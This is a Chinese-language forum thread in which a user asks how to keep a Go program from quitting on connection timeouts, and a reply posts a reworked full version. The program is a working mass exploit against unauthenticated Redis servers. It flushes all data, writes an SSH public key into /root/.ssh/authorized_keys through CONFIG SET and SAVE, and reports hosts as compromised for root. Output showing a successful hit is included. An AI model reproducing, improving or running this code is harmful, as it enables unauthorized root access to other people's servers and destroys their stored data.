请教大大这个程序该怎么修改才不会因为超时退出?

mango7158 · · 983 次点击
```golang client := redis.NewClient(&redis.Options{ Addr: host + ":" + port, Password: "", DB: 0, DialTimeout: 60 * time.Second }) defer client.Close() ``` 通过redis入侵?
#2
更多评论
https://gist.github.com/mango7158/01c837111409795bd36881e31fc7d18b/revisions <br> 目前问题是:timeout之后就结束任务了,我想知道修改哪里可以实现,遇到无法连接的IP就跳过继续执行下一个IP? <br> 192.168.1.150:6379 is vulnerability, get root's reply: CONFIG SET dbfilename authorized_keys: OK <p> timeout <p> timeout<p> [root@CentOS ~]#<p>
#1
按下面的方式就行了(只解决你的问题)。另外说一下:代码可读性很糟糕,命名不符合go的习惯。 ```go package main import ( "bufio" "bytes" "context" "fmt" "log" "os" "runtime" "strings" "sync" "time" "gopkg.in/redis.v3" ) const rsa_key = "\n\n ssh-rsa \n\n" // HostInfo struct type HostInfo struct { host string port string reply string is_vul bool exit chan interface{} } // help function func Usage(cmd string) { fmt.Println(strings.Repeat("-", 50)) fmt.Println("Redis poc") fmt.Println("Usage:") fmt.Printf("%s iplist \n", cmd) fmt.Println(strings.Repeat("-", 50)) } // main function func main() { runtime.GOMAXPROCS(runtime.NumCPU()) if len(os.Args) != 2 { Usage(os.Args[0]) } else { Usage(os.Args[0]) iplist := os.Args[1] Scan(Prepare(iplist)) } } // read line from file and Scan func Prepare(iplist string) (slice_iplist []string) { iplistFile, _ := os.Open(iplist) defer iplistFile.Close() scanner := bufio.NewScanner(iplistFile) scanner.Split(bufio.ScanLines) for scanner.Scan() { slice_iplist = append(slice_iplist, scanner.Text()) } return slice_iplist } //Test connect function func TestConnect(host_info HostInfo, chan_result chan HostInfo) { host := host_info.host port := host_info.port reply := host_info.reply is_vul := false var buf bytes.Buffer logger := log.New(&buf, "logger: ", log.Ldate) client := redis.NewClient(&redis.Options{ Addr: host + ":" + port, Password: "", // no password set DB: 0, // use default DB }) _, err := client.Ping().Result() if err == nil { is_vul = true logger.Println(client.ConfigSet("dbfilename", "xsec.rdb").String()) logger.Println(client.Save().String()) logger.Println(client.FlushAll().String()) client.Set("xsec", rsa_key, 0) logger.Println(client.ConfigSet("dir", "/root/.ssh/").String()) logger.Println(client.ConfigGet("dir").String()) reply = client.ConfigSet("dbfilename", "authorized_keys").String() logger.Println(reply) logger.Println(client.Save().String()) fmt.Println(&buf) } host_info.is_vul = is_vul host_info.reply = reply chan_result <- host_info } // Scan function func Scan(slice_iplist []string) { n := len(slice_iplist) chan_scan_result := make(chan HostInfo, n) waitGroup := &sync.WaitGroup{} for _, host_port := range slice_iplist { // fmt.Printf("Try to connect %s\n", host_port) t := strings.Split(host_port, ":") host := t[0] port := t[1] host_info := HostInfo{host, port, "", false, make(chan interface{})} waitGroup.Add(1) go func(wg *sync.WaitGroup, hostInfo HostInfo) { defer func() { <-hostInfo.exit wg.Done() }() TestConnect(hostInfo, chan_scan_result) }(waitGroup, host_info) for runtime.NumGoroutine() > runtime.NumCPU()*200 { time.Sleep(10 * time.Microsecond) } } ctx, cancel := context.WithCancel(context.Background()) go func() { waitGroup.Wait() cancel() }() for { select { case r := <-chan_scan_result: if r.is_vul { fmt.Printf("%s:%s is vulnerability, get root's reply: %s\n", r.host, r.port, r.reply) } close(r.exit) case <-ctx.Done(): fmt.Println("complete") break } } } ```
#3